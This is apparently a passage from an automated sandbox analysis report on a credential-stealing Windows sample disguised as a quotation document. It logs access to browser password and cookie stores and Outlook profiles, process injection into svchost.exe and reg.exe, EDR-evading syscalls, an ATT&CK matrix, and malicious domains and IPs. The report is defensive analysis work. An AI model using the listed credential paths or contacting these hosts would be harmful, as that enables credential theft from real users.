                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Circular No.12-7 Quotation.exeBinary or memory string: WIN_81
                Source: Circular No.12-7 Quotation.exeBinary or memory string: WIN_XP
                Source: Circular No.12-7 Quotation.exeBinary or memory string: WIN_XPe
                Source: Circular No.12-7 Quotation.exeBinary or memory string: WIN_VISTA
                Source: Circular No.12-7 Quotation.exeBinary or memory string: WIN_7
                Source: Circular No.12-7 Quotation.exeBinary or memory string: WIN_8
                Source: Circular No.12-7 Quotation.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3410503483.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1100047298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3412367873.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3414676780.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3412285944.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1100405446.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1100935711.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3412469604.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C86747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00C86747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                5
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                5
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                5
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets161
                Security Software Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Modify Registry
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Virtualization/Sandbox Evasion
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
                Process Injection
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1638345 Sample: Circular No.12-7 Quotation.exe Startdate: 14/03/2025 Architecture: WINDOWS Score: 100 28 www.tgwfj.xyz 2->28 30 www.nodefolio.xyz 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 6 other signatures 2->50 10 Circular No.12-7 Quotation.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 3kdbs1NJMiXeHlFl.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 reg.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 3kdbs1NJMiXeHlFl.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.maxank.top 162.254.32.77, 49703, 49704, 49705 VIVIDHOSTINGUS United States 22->34 36 www.super-mist.store 103.224.182.242, 49751, 49752, 49753 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.